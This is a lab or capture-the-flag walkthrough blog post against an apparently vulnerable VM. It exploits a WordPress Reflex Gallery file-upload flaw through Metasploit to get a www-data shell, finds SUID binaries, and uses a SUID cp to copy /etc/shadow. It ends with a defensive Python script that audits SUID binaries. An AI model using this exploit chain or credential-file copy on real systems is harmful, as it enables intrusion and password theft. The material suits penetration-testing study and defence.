1. As always, an nmap scan reveals only TCP/80 open, serving the default Apache install page.
  2. dirb (or gobuster) reveals a subdirectory called wordpress. Easy!
  3. wpscan --url http://192.168.53.23/wordpress --enumerate p (enumerate the installed plugins to see if any are vulnerable).
  4. Reflex Gallery 3.1.3 has an Arbitrary File Upload vulnerability: http://wpvulndb.com/vulnerabilities/7867
  5. Open MSF with # msfconsole and select the exploit with msf6 > use exploit/unix/webapp/wp_reflexgallery_file_upload
  6. Enter msf > show options and set RHOST to the target IP address; also set LHOST (your IP) and TARGETURI to http://192.168.53.23/wordpress so the exploit hits the right directory on the server.
  7. You'll be dumped to a meterpreter prompt. Enter shell: the resulting shell looks unresponsive, but it's there. Type a command (id) to confirm:

meterpreter > shell
Process 31924 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Sweet! We’re in the door!

8. We're just www-data, so we'll need to escalate privileges.
9. Many privilege escalations rely on SUID binaries, so we'll start there. Enter find / -perm -u=s -type f 2>/dev/null to reveal 79 (!!) SUID binaries.
Recall that a SUID binary runs with the privileges of its owner (root, for these), so we can use those privileges to do dirty things and get root. Awesome.
10. First things first, get the first flag with cat /home/raj/local.txt
11. Two key binaries have the SUID bit set, cp and wget. That is a critical vulnerability: you can copy sensitive files around as root and replace files to change security parameters. We'll do that.
12. cp /etc/shadow /home/raj/shadow. That should get you started for a bit.
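From the defender's side, the same enumeration the writeup runs in step 9 is the audit: the only SUID bits that should exist are the handful a distribution ships, and anything else (cp and wget here) is a misconfiguration to strip. The script below is an added example, not from the original writeup or the box's author; it parses find output against an allowlist (the allowlist and the sample find output are constructed assumptions, adjust them to your own baseline) and can also walk a live filesystem.

```python
"""SUID baseline audit (added example, not part of the original writeup).

Flags SUID binaries that are not on an expected allowlist, so an admin can
spot unintended bits such as the ones on cp and wget before an attacker does.
The allowlist and the sample find output are constructed for illustration.
"""
import os
import stat

# Typical SUID-root binaries on a Debian/Ubuntu host. This is an assumption;
# build the real baseline from a known-good install of your own image.
EXPECTED_SUID = frozenset({
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/bin/su",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/bin/mount", "/bin/umount", "/usr/bin/mount", "/usr/bin/umount",
    "/usr/bin/pkexec", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
})

# Constructed sample of what `find / -perm -u=s -type f 2>/dev/null` printed.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/cp
/usr/bin/wget
/bin/mount
/usr/bin/chsh
"""


def unexpected_suid(find_output: str, expected=EXPECTED_SUID) -> list[str]:
    """Return SUID paths from `find` output that are not in the expected set."""
    paths = [line.strip() for line in find_output.splitlines() if line.strip()]
    return sorted(p for p in paths if p not in expected)


def live_suid_scan(root: str = "/") -> list[str]:
    """Walk the filesystem and return regular files that carry the SUID bit.

    Equivalent to the writeup's find command, done in-process so it can be
    scheduled from a monitoring job. Symlinks are not followed.
    """
    found = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished; skip rather than abort
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


if __name__ == "__main__":
    # Audit the constructed sample; on a real host feed it "\n".join(live_suid_scan()).
    for path in unexpected_suid(SAMPLE_FIND_OUTPUT):
        print(f"UNEXPECTED SUID: {path}  (remediate with: chmod u-s {path})")
```

On the sample the two findings are /bin/cp and /usr/bin/wget, which is exactly the pair the writeup abuses; run it as root on the real box (or pipe in the find output) and diff the result against the baseline on every patch cycle.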

More to follow. Dinner time!

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.